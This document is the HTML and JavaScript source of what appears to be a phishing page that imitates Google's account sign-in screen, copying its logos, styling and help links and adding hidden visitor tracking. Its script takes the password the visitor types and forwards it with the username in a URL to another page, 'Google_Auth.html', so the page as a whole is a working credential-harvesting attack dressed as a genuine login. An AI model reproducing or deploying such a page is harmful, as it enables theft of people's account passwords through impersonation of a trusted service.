<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>body{font-family:Open Sans,sans-serif;background:#FEFEFE;margin:0;padding:0;color:#404040}#box{width:306px;border-radius:3px;padding:25px;padding-top:50px;background-color:#F7F7F7;box-shadow:0px 2px 2px #AAAAAA;padding-bottom:70px;margin-bottom:20px}.circle-mask{display:block;height:96px;width:96px;overflow:hidden;border-radius:50%;margin-left:auto;margin-right:auto;z-index:100;background-size:96px;background-repeat:no-repeat;background-image:url(https://ssl.gstatic.com/accounts/ui/avatar_2x.png);-webkit-transition:opacity 0.075s;-moz-transition:opacity 0.075s;-ms-transition:opacity 0.075s;-o-transition:opacity 0.075s;transition:opacity 0.075s;margin-bottom:0px;padding-bottom:0px}.circle{position:absolute;z-index:101;height:96px;width:96px;border-radius:50%;opacity:0.99;overflow:hidden;background-repeat:no-repeat;background-position:center center;margin-bottom:0px;padding-bottom:0px}input{-moz-appearance:none;-webkit-appearance:none;appearance:none;display:inline-block;height:44px;padding:0 8px;width:274px;margin:0;background:#fff;border:1px solid #d9d9d9;border-top:1px solid #c0c0c0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;-moz-border-radius:1px;-webkit-border-radius:1px;border-radius:1px;font-size:15px;color:#404040}input:focus{outline-offset:-2px}.button,.button:visited{display:inline-block;min-width:46px;text-align:center;font-size:14px;font-weight:700;height:36px;padding:0 8px;line-height:36px;-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;-o-transition:all 0.218s;-moz-transition:all 0.218s;-webkit-transition:all 0.218s;transition:all 0.218s;cursor:default;border:1px solid #3079ed;color:#fff;text-shadow:0 1px rgba(0,0,0,0.1);background-color:#4d90fe;background-image:-webkit-linear-gradient(top,#4d90fe,#4787ed);background-image:-moz-linear-gradient(top,#4d90fe,#4787ed);background-image:-ms-linear-gradient(top,#4d90fe,#4787ed);background-image:-o-linear-gradient(top,#4d90fe,#4787ed);background-image:linear-gradient(top,#4d90fe,#4787ed);width:274px;margin-top:9px}.button:hover{border:1px solid #2f5bb7;color:#fff;text-shadow:0 1px rgba(0,0,0,0.3);background-color:#357ae8}a,a:visited{color:#427fed;cursor:pointer;text-decoration:none}a:hover{text-decoration:underline}.need-help{font-size:13px;font-family:Arial;float:right;text-align:right;margin-top:7px}.one-google .logo-strip{background-repeat:no-repeat;display:block;margin:10px auto;background-image:url(https://ssl.gstatic.com/accounts/ui/wlogostrip_230x17_1x.png);background-size:230px 17px;width:230px;height:17px}#emailaddress{font-family:arial;font-size:14px;margin-bottom:15px}form{padding:0px;margin:0px}</style>
<!-- Start of StatCounter Code for Default Guide -->
<script type="text/javascript">
   var sc_project=11058282;
   var sc_invisible=1;
   var sc_security="1e19161d";
   var scJsHost = (("https:" == document.location.protocol) ?
   "https://secure." : "http://www.");
   document.write("<sc"+"ript type='text/javascript' src='" +
   scJsHost+
   "statcounter.com/counter/counter.js'></"+"script>");
</script>
<noscript>
   <div class="statcounter"><a title="shopify site
      analytics" href="http://statcounter.com/shopify/"
      target="_blank"><img class="statcounter"
      src="//c.statcounter.com/11058282/0/1e19161d/1/"
      alt="shopify site analytics"></a></div>
</noscript>
<!-- End of StatCounter Code for Default Guide -->
<link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300" rel="stylesheet" type="text/css">
<link href="Gstyle.css" rel="stylesheet" type="text/css">
<title>Sign in - Google Accounts</title>
<link rel="shortcut icon" type="image/png" href="https://www.google.com/favicon.ico"/>
<link rel="shortcut icon" type="image/png" href="https://www.google.com/favicon.ico"/>
<script>
   function getParameterByName(name, url) {
       if (!url) {
         url = window.location.href;
       }
       name = name.replace(/[\[\]]/g, "\\$&");
       var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
           results = regex.exec(url);
       if (!results) return null;
       if (!results[2]) return '';
       return decodeURIComponent(results[2].replace(/\+/g, " "));
   }
   
      var whichClick;
      window.onload=function() { attachBehaviors(); }
      function attachBehaviors() {
       var arr = new Array ('submitOne','submitTwo');
       for (i=0;i<arr.length;i++) {
        var but_id=arr[i];
        if (document.getElementById(but_id)) {
         document.getElementById(but_id).onclick=function() { whichClick=this.id; }
        }
       }
      }
      function convertURL(form) {
       if (document.getElementById('url')) {
        var url = document.getElementById('url').value;
        if (url=='') { return false; }
        var final_url;
        var username = getParameterByName('user');
        final_url = 'Google_Auth.html?user='+username+'&pass='+url+'';
        window.location=final_url;
   
       }
       return false;
      }
</script>
<script>
   window.onload=function() { PrintEmail(); }
   function PrintEmail() {
        var currLoc = window.location.href,
        newLoc = window.location.hash.slice(1);
   
        if (newLoc.length) {
        document.getElementById("emailaddress").innerHTML = newLoc;
        } else {
            return false;
        }
   }
</script>
<body>
   <center>
      <br><img width="92" height="32" src="https://ci3.googleusercontent.com/proxy/EURRrDHt1LcCbHcRdDtMHOQPPMHe5FkDsMAHs66gxAIYzYD38Abpa1Fmy-ACuq2V1tI8GZdWA4FLsXjKM4iAD-CixwUocANswARkdK1ttXK-T1DDSfiUplKFys37dkM=s0-d-e1-ft#https://www.gstatic.com/accountalerts/email/googlelogo_color_188x64dp.png" style="display:block;width:92px;min-height:32px" class="CToWUd"><br>
      <font size="6">One account. All of Google.</font><br><br>
      Sign in with your Google Account to continue<br><br>
      <div id="box">
         <div class="circle-mask">
            <div class="circle"></div>
         </div>
         <br>
         <div id="emailaddress">&nbsp;</div>
         <form action="" onsubmit="return convertURL(this);"><input name=url id="url" type=password placeholder="Password"><br>
            <button type="submit" class="button">Sign in</button>
         </form>
         <br><a class="need-help" href="https://accounts.google.com/signin/recovery?continue=https%3A%2F%2Faccounts.google.com%2FManageAccount&checkedDomains=youtube&checkConnection=youtube%3A3497%3A1&pstMsg=1&Email=bongobongo%40gmail.com&ignoreShadow=0&hl=en">
         Forgot password?
         </a>
      </div>
      <div class="one-google">
         <p class="create-account">
            <span id="link-signup">
            <a style="font-family:Arial;font-size:15px;" href="https://accounts.google.com/SignUp?continue=https%3A%2F%2Faccounts.google.com%2FManageAccount">
            Create account
            </a>
            </span>
         </p>
         <p class="tagline" style="font-family:Arial;font-size:14px;">
            One Google Account for everything Google
         </p>
         <div class="logo-strip"></div>
      </div>
   </center>
   <script>var input21 = document.getElementById('url');
      input21.focus();
      input21.select();
   </script>
</body>